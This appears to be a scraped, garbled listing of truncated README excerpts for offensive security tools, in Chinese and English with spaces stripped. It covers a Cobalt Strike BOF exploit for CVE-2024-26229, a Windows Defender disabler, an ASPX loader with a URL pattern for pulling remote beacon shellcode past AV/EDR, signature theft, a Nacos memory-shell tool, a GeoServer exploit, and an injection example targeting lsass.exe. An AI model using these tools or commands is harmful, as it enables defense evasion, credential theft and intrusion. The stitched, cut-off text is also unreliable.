CVE-2024-26229BeaconObjectFilesBeaconObjectFile(BOF)implementationsfromNVISOofCVE-2024-26229forCobaltStrikeandBruteRatel.Compilewith:gcc-cCVE-2024-26229-bof.c-oCVE-2024-26229-bof.oThisvulnerabilitywas…

estNet资产管理系统旨在提供全面、高效的互联网资产管理与监控服务，构建详细的资产信息库。该系统能够帮助企业安全团队或渗透测试人员对目标资产进行深入侦察和分析，提供攻击者视角的持续风险监测，协助用户实时掌握资产动态，识别并修复安全漏洞，从而有效收敛攻击面，提升整体安全防护能力。###目前功能[X]项目管理[X]资产管理（公司、域名、子域名、IP、端口、Web、API、漏洞、资产标签、黑名单等）[…

前提這是由https://gitee.com/liyouyinjia/ctftools-all-in-one轉發至Github過來，目的讓牆內外的都能夠下載到本程式。方案归@liyouyinjia及参与贡献者拥有。介绍随着网络安全领域的不断发展，网络安全竞赛（CaptureTheFlag，简称CTF）已经成为衡量网络安全人才技能水平的重要平台。CTF竞赛不仅要求参赛者具备深厚的网络安全理论知识，还…

温馨提示：该工具运行时不会对目标IP主动扫描，但是会调用第三方接口，所以会存在对互联网发送大量HTTP请求情况，如果网络环境比较特殊的场景下请勿使用该工具，避免引起不必要的麻烦。免责声明：此工具仅限于学习交流，请在下载后24小时内删除，请勿非法使用该工具，用户承担因使用此工具而导致的所有法律和相关责任！作者不承担任何法律责任！一、工具背景背景：在攻防演练期间，对于重保值守人员，某些客户要求对攻击I…

no-defenderre-upno-defenderAslightlymorefunwaytodisablewindowsdefender.HowitworksThere'saWSC(WindowsSecurityCenter)serviceinWindowswhichisusedbyantivirusestoletWindowsknowthatthere'ssomeotherantivirus…

说明ASPX内存执行shellcode,绕过WindowsDefender（AV/EDR），这只是个代码例子，目的是为了学习部分杀软（AV/EDR）可能需要你的Bin能够做到内存免杀持续更新中，包括后续的JSP内存加载使用将shellcode远程托管到任意网站（URLB）http://URLA/bypass.aspx?shellcodeURL=http://URLB/beacon_x64.bin视…

一键窃取签名程序的图标、资源信息，版本信息、修改时间、数字签名（无效），使程序正规化。对抗QVM数字签名是无效的，但是可以起到模拟的作用可以生成程序的图标存根 Thief.mp4 参考https://github.com/sorabug/ChangeTimestamphttps://github.com/secretsquirrel/SigThief

使用注意：先判断漏洞和系统可能是未授权可能是后台后台就填一下accesstoken这个非必填落地jar目录必须写内存马连接问题url要形如http://127.0.0.1:8848/nacos/111一直在部署就参考一下6部署函数id问题没办法存一下吧✅(被部署太多不容易打，可参考6)本地加载✅关闭时要结束进程✅内存马太大怎么办？命令写内存jar？精简？❎换蚁剑✅判断系统人工选择路径✅擦屁股/爆菊…

geoserverCVE-2024-36401声明：仅用于授权测试，用户滥用造成的一切后果和作者无关请遵守法律法规！工具稍后放出原本没打算写的，主要是想着直接去搜一下工具，直接用着方便就OK了找到一个geoserverCVE-2024-36401漏洞利用工具GeoServer综合漏洞扫描工具V1.2发布！但是实际使用下来感觉到这个工具稍微有点Lk，作者说是go语言写的，速度极快，主要表现是两点1、…

一款从Ring0和3以及APC注入的提权注入工具。//开源无🐎,relax!!Usage:APC注入example:InjectTools.exe你要注入的程序DLL路径InjectTools.exelsass.exeC:\Users\ASUS\Desktop\artifact_x64.dllDLL注入example:InjectTools.exe你要注入的程序DLL路径InjectTools.e…